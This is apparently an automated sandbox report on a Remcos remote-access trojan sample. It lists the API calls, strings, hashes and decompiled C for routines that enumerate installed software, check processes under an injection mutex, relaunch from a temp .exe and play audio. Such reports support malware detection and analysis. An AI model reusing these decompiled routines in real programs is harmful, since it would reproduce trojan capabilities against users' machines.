                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                  • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1820998543-3714951968
                                  • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                  • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409A2F, Relevance: 80.7, APIs: 42, Strings: 4, Instructions: 228processsynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                  • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                  • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                  • wcslen.MSVCRT ref: 00409C25
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                  • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                  • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                  • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                  • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                  • API String ID: 2459104678-694575909
                                  • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                  • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A906, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                    • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • exit.MSVCRT ref: 0040A97F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                  • exit.MSVCRT ref: 0040A9A9
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                  • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                  • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                  • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                  • exit.MSVCRT ref: 0040AB2A
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                  • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                    • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                    • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                  • String ID: .exe$WDH$exepath$open$temp_
                                  • API String ID: 2802067201-3088914985
                                  • Opcode ID: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                  • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                  • Opcode Fuzzy Hash: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                  • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411D8A, Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E004135DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E00412E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L0041416A();
					_t36 =  &_v52;
					L00414146();
					_t37 =  &_v36;
					L0041414C();
					_t38 =  &_v20;
					L00414146();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41c178, 0xa9, 0x415664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x41c1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x41c1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x41c1d2 = 0;
							}
							if( *0x41c1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x41c1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x41c1d4);
							}
							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
								CloseHandle( *0x41c1d4);
								 *0x41c1d4 = 0;
							}
						} while ( *0x41c1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                  0x00411d8a
                                  0x00411d9b
                                  0x00411da9
                                  0x00411dae
                                  0x00411dbb
                                  0x00411dc0
                                  0x00411dc7
                                  0x00411dd0
                                  0x00411dd0
                                  0x00411dd9
                                  0x00411de4
                                  0x00411f46
                                  0x00411f55
                                  0x00000000
                                  0x00411f5b
                                  0x00411f69
                                  0x00411f79
                                  0x00411f79
                                  0x00411dea
                                  0x00411dea
                                  0x00411df9
                                  0x00411dff
                                  0x00411e04
                                  0x00411e07
                                  0x00411e24
                                  0x00411e2d
                                  0x00411e36
                                  0x00411e3a
                                  0x00411e43
                                  0x00411e47
                                  0x00411e50
                                  0x00411e54
                                  0x00411e5f
                                  0x00411e68
                                  0x00411e71
                                  0x00411e7a
                                  0x00411e86
                                  0x00411e8d
                                  0x00411ea1
                                  0x00411eb1
                                  0x00411ec1
                                  0x00411ecb
                                  0x00411ed3
                                  0x00411ed8
                                  0x00411ede
                                  0x00411ee4
                                  0x00411eee
                                  0x00411ef0
                                  0x00411ef0
                                  0x00411efc
                                  0x00411f06
                                  0x00411f08
                                  0x00411f08
                                  0x00411f1a
                                  0x00411f1c
                                  0x00411f21
                                  0x00411f24
                                  0x00411f24
                                  0x00411f26
                                  0x00411f2a
                                  0x00000000
                                  0x00000000
                                  0x00411f2e
                                  0x00411f42
                                  0x00411f42
                                  0x00411f30
                                  0x00411f30
                                  0x00411f33
                                  0x00411f38
                                  0x00000000
                                  0x00411f3a
                                  0x00411f3b
                                  0x00411f3d
                                  0x00411f40
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00411f40
                                  0x00411f38
                                  0x00000000
                                  0x00411f2e
                                  0x00411f83
                                  0x00411f85
                                  0x00411f88
                                  0x00411f8a
                                  0x00411f92
                                  0x00411f92
                                  0x00411fab
                                  0x00411fb3
                                  0x00411fb9
                                  0x00411fb9
                                  0x00411fbf
                                  0x00411ede
                                  0x00411fd3
                                  0x00411fdd
                                  0x00411fed
                                  0x00411ffd
                                  0x00412005
                                  0x00412005
                                  0x0041200e
                                  0x00412018

                                  APIs
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                  • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                  • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
